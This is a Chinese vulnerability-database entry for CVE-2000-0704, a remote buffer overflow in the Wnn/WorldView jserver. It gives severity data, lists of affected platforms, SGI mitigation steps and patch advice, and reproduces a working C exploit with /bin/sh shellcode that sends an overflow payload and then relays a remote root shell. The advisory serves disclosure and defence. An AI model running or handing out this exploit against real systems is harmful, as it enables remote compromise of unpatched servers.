CVE-2000-0704
CVSS10.0
发布时间 :2000-10-20 00:00:00
修订时间 :2008-09-05 16:21:41
NMCOES    

[原文]Buffer overflow in SGI Omron WorldView Wnn allows remote attackers to execute arbitrary commands via long JS_OPEN, JS_MKDIR, or JS_FILE_INFO commands.


[CNNVD]WorldView Wnn Jserver远程缓冲区溢出漏洞(CNNVD-200010-054)

        
        Wnn是一个日语翻译系统,常常用于Unix系统以提供外语支持。它是一个服务器-客户端的应用程序,Jserver部分作为服务器端,为客户端提供翻译服务。
        某些版本的Wnn存在远程缓冲区溢出漏洞,远程攻击者可能利用此漏洞通过溢出攻击在主机上以Jserver进程的权限执行任意指令。
        向Jserver提交诸如JS_OPEN、JS_MKDIR 或JS_FILE_INFO这些Wnn命令时,跟随一个超长字符串,就会导致远程缓冲区溢出。精心构造导致溢出的字符串,有可能以Jserver所拥有的权限执行任意指令,通常可获取root用户权限。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:wnn:wnn4:4.2.8
cpe:/a:freewnn:freewnn:1.0
cpe:/a:omron:worldview:6.5
cpe:/a:wnn:wnn4:4.2.2tl
cpe:/a:freewnn:freewnn:1.1
cpe:/a:wnn:wnn4:4.2.5tl
cpe:/a:freewnn:freewnn:1.1.1_axxx

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0704
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0704
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-054
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1603
(VENDOR_ADVISORY)  BID  1603
ftp://sgigate.sgi.com/security/20000803-01-A
(UNKNOWN)  SGI  20000803-01-A
http://xforce.iss.net/xforce/xfdb/5163
(UNKNOWN)  XF  irix-worldview-wnn-bo(5163)
http://www.osvdb.org/11080
(UNKNOWN)  OSVDB  11080

- 漏洞信息

WorldView Wnn Jserver远程缓冲区溢出漏洞
危急 边界条件错误
2000-10-20 00:00:00 2005-10-20 00:00:00
远程  
        
        Wnn是一个日语翻译系统,常常用于Unix系统以提供外语支持。它是一个服务器-客户端的应用程序,Jserver部分作为服务器端,为客户端提供翻译服务。
        某些版本的Wnn存在远程缓冲区溢出漏洞,远程攻击者可能利用此漏洞通过溢出攻击在主机上以Jserver进程的权限执行任意指令。
        向Jserver提交诸如JS_OPEN、JS_MKDIR 或JS_FILE_INFO这些Wnn命令时,跟随一个超长字符串,就会导致远程缓冲区溢出。精心构造导致溢出的字符串,有可能以Jserver所拥有的权限执行任意指令,通常可获取root用户权限。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 如果没有使用Jserver,请禁用它。
        * 如果您在SGI图形工作站上运行Omron's Wnn6,SGI建议您通过如下步骤禁用Jserver:
        1) su成超级用户
         % /bin/su -
         Password:
         #
        2) 检查是否安装了WorldView,只有安装过WorldView的系统才受此问题影响
         # versions -b
         I WorldView_base_jp 05/06/1998 WorldView Base Japanese 6.5
         I WorldView_books_jp 05/06/1998 WorldView Books: Japanese 6.5
         I WorldView_fonts_jp1 05/06/1998 WorldView Fonts Japanese, 6.5
         I WorldView_japanese 05/06/1998 WorldView Japanese 6.5
        3) 如果当前不需要WorldView,请禁用Jserver
         # chkconfig jserver off
         注意: 这将同时禁用日语输入功能
        4) 在/etc/passwd和/etc/group中增加如下行
         /etc/passwd:
         wnn:*:127:127:Wnn System Account:/usr/lib/wnn6:/bin/sh
         /etc/group:
         wnn:*:127
        5) 修改WNN相关文件的属主
         # chown -R wnn.sys /usr/bin/Wnn6
         # chown -R wnn.sys /usr/lib/wnn6
        6) 检查文件属主确实被改动过了
         # ls -ls /usr/bin/Wnn6/jserver
         1136 -r-sr-xr-x 1 wnn sys 578660
         # ls -ls /usr/lib/wnn6/serverdefs
         8 -rw-r--r-- 1 wnn sys 662
        7) 重启系统
         # reboot
        厂商补丁:
        FreeWnn
        -------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.freewnn.org/

- 漏洞信息 (20163)

WorldView 6.5/Wnn4 4.2 Asian Language Server Remote Buffer Overflow Vulnerability (EDBID:20163)
unix remote
2000-03-08 Verified
0 UNYUN
N/A [点击下载]
source: http://www.securityfocus.com/bid/1603/info

A remote buffer overflow exists in the Asian language servers portion of a number of different implementations of Wnn. It has been reported that only systems that have WorldView Japanese, Korean, and Chinese installed are vulnerable to this issue. Wnn is a Kana-Kanji translation system, most commonly used for foreign language support in Unix systems.

An overflow exists when the server receives a long string with a Wnn command, such as JS_OPEN, JS_MKDIR or JS_FILE_INFO included. By creating a buffer containing machine executable code, it is possible to cause a remote system running the jserver daemon to execute arbitrary commands as the user the daemon is running as. This is frequently root.

/*=============================================================================
   Wnn4.2 / jserver remote buffer overflow exploit for Linux
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  =============================================================================
*/
#include <stdio.h>
#include <netdb.h>
#include <fcntl.h>
#include <ctype.h>
#include <unistd.h>
#include <strings.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <netinet/in.h>

#define TARGET_PORT 22273
#define COMMAND     0x01
#define VERSION     0x4000
#define MAXBUF      800
#define STR1_SIZE   10
#define NOP         0x90
#define RET         0xbffffcb4
#define ADJUST      3

char *shellcode =
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89\xf0\xab"
"\x89\xfa\x31\xc0\xab\xb0\x04\x04\x07\xcd\x80\x31\xc0\x89\xc3\x40\xcd\x80"
"\xe8\xd9\xff\xff\xff/bin/sh";

void putint(sockfd,c)
int sockfd,c;
{
    unsigned char tmp[4];

    tmp[0]=(c >> (8 * 3))&0xff;
    tmp[1]=(c >> (8 * 2))&0xff;
    tmp[2]=(c >> (8 * 1))&0xff;
    tmp[3]=c&0xff;
    write(sockfd,tmp,4);
}

void term (int p, int c)
{
    char    buf[1032];
    fd_set  rfds;
    int     i;

    while(1){
        FD_ZERO (&rfds);
        FD_SET (p, &rfds);
        FD_SET (c, &rfds);
        if (select ((p > c ? p : c) + 1, &rfds, NULL, NULL, NULL) < 1) return;
        if (FD_ISSET (c, &rfds)){
            if ((i = read (c, buf, sizeof (buf))) < 1) exit (0);
            else write (p, buf, i);
        }
        if (FD_ISSET (p, &rfds)){
            if ((i = read (p, buf, sizeof (buf))) < 1) exit (0);
            else write (c, buf, i);
        }
    }
}
main(int argc,char *argv[])
{
    int                 sockfd,i;
    struct in_addr      addr;
    struct sockaddr_in  target;
    struct hostent      *hs;
    char                buf[MAXBUF];

    if (argc<2){
        printf("usage : %s TargetHost\n",argv[0]);
        exit(1);
    }
    sockfd=socket(AF_INET, SOCK_STREAM, 0);
    target.sin_family=AF_INET;
    target.sin_port=htons(TARGET_PORT);
    if ((target.sin_addr.s_addr=inet_addr(argv[1]))==-1){
        if ((hs=gethostbyname(argv[1]))==NULL){
            printf("Can not resolve specified host.\n");
            exit(1);
        }
        target.sin_family = hs->h_addrtype;
        memcpy((caddr_t)&target.sin_addr.s_addr,hs->h_addr,hs->h_length);
    }
    if (connect(sockfd, (struct sockaddr*)&target, sizeof(target))!=0){
        printf("Can not connect to %s:%d\n",argv[1],TARGET_PORT);
        exit(1);
    } 
    putint(sockfd,COMMAND);
    putint(sockfd,VERSION);

    memset(buf,NOP,MAXBUF);
    printf("Jumping Address=%x\n",RET);
    for (i=100+ADJUST;i<400+ADJUST;i+=4){
        buf[i+3]=(RET>>24)&0xff;
        buf[i+2]=(RET>>16)&0xff;
        buf[i+1]=(RET>>8)&0xff;
        buf[i+0]=RET&0xff;
    }
    buf[STR1_SIZE]=0;
    buf[MAXBUF-1]=0;
    memcpy(buf+600+ADJUST,shellcode,strlen(shellcode));
    write(sockfd,buf,MAXBUF);
    printf("Connected to %d\n",TARGET_PORT);
    term(sockfd,0);
}		

- 漏洞信息

11080
IRIX Omron WorldView Wnn Multiple Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS, Upgrade
Exploit Public

- 漏洞描述

A remote overflow exists in WorldView on IRIX. The jserver fails to validate input resulting in a buffer overflow. With a specially crafted request, such as a long string with a Wnn command (JS_OPEN, JS_MKDIR or JS_FILE_INFO), an attacker can execute arbitrary shellcode as root, resulting in a loss of integrity.

- 时间线

2000-03-08 Unknow
2000-03-08 Unknow

- 解决方案

Upgrade to version 6.5.16 or higher, as it has been reported to fix this vulnerability. In addition, SGI has released a patch for some older versions.

- 相关参考

- 漏洞作者

- 漏洞信息

Omron WorldView Wnn Asian Language Server Remote Buffer Overflow Vulnerability
Boundary Condition Error 1603
Yes No
2000-03-08 12:00:00 2009-07-11 02:56:00
This vulnerability was discovered by UNYUN <shadowpenguin@backsection.net>

- 受影响的程序版本

Wnn Wnn4 4.2 -8
+ Turbolinux Turbolinux 4.2
+ Turbolinux Turbolinux 4.0
Wnn Wnn4 4.2 -5TL
+ Turbolinux Turbolinux 3.0
Wnn Wnn4 4.2 -2TL
+ Turbolinux Turbolinux 2.0
Omron WorldView 6.5
+ SGI IRIX 6.5.15 m
+ SGI IRIX 6.5.15 f
+ SGI IRIX 6.5.15
+ SGI IRIX 6.5.14 m
+ SGI IRIX 6.5.14 f
+ SGI IRIX 6.5.14
+ SGI IRIX 6.5.13 m
+ SGI IRIX 6.5.13 f
+ SGI IRIX 6.5.13
+ SGI IRIX 6.5.12 m
+ SGI IRIX 6.5.12 f
+ SGI IRIX 6.5.12
+ SGI IRIX 6.5.11 m
+ SGI IRIX 6.5.11 f
+ SGI IRIX 6.5.11
+ SGI IRIX 6.5.10 m
+ SGI IRIX 6.5.10 f
+ SGI IRIX 6.5.10
+ SGI IRIX 6.5.9 m
+ SGI IRIX 6.5.9 f
+ SGI IRIX 6.5.9
+ SGI IRIX 6.5.8 m
+ SGI IRIX 6.5.8 f
+ SGI IRIX 6.5.8
+ SGI IRIX 6.5.7 m
+ SGI IRIX 6.5.7 f
+ SGI IRIX 6.5.7
+ SGI IRIX 6.5.6 m
+ SGI IRIX 6.5.6 f
+ SGI IRIX 6.5.6
+ SGI IRIX 6.5.5 m
+ SGI IRIX 6.5.5 f
+ SGI IRIX 6.5.5
+ SGI IRIX 6.5.4 m
+ SGI IRIX 6.5.4 f
+ SGI IRIX 6.5.4
+ SGI IRIX 6.5.3 m
+ SGI IRIX 6.5.3 f
+ SGI IRIX 6.5.3
+ SGI IRIX 6.5.2 m
+ SGI IRIX 6.5.2 f
+ SGI IRIX 6.5.2
+ SGI IRIX 6.5.1
+ SGI IRIX 6.5
FreeWnn FreeWnn 1.1.1 -aXXX
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- HP HP-UX 10.20
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- SGI IRIX 6.3
- SGI IRIX 6.2
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
FreeWnn FreeWnn 1.1
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- HP HP-UX 10.20
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- SGI IRIX 6.3
- SGI IRIX 6.2
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
FreeWnn FreeWnn 1.0
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- HP HP-UX 10.20
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- SGI IRIX 6.3
- SGI IRIX 6.2
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6

- 漏洞讨论

A remote buffer overflow exists in the Asian language servers portion of a number of different implementations of Wnn. It has been reported that only systems that have WorldView Japanese, Korean, and Chinese installed are vulnerable to this issue. Wnn is a Kana-Kanji translation system, most commonly used for foreign language support in Unix systems.

An overflow exists when the server receives a long string with a Wnn command, such as JS_OPEN, JS_MKDIR or JS_FILE_INFO included. By creating a buffer containing machine executable code, it is possible to cause a remote system running the jserver daemon to execute arbitrary commands as the user the daemon is running as. This is frequently root.

- 漏洞利用

The following exploit was provided by UNYUN (shadowpenguin@backsection.net).

- 解决方案

SGI has stated that IRIX 6.5 through to IRIX 6.5.15 are vulnerable to this issue. SGI also has issued patches (4632, 4633, 4644, 4645, 4646, 4647) to address this vulnerability.

SGI has stated that IRIX 6.5.16 is not vulnerable to this issue. Users are advised to upgrade to a newer version of IRIX.


Omron WorldView 6.5

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站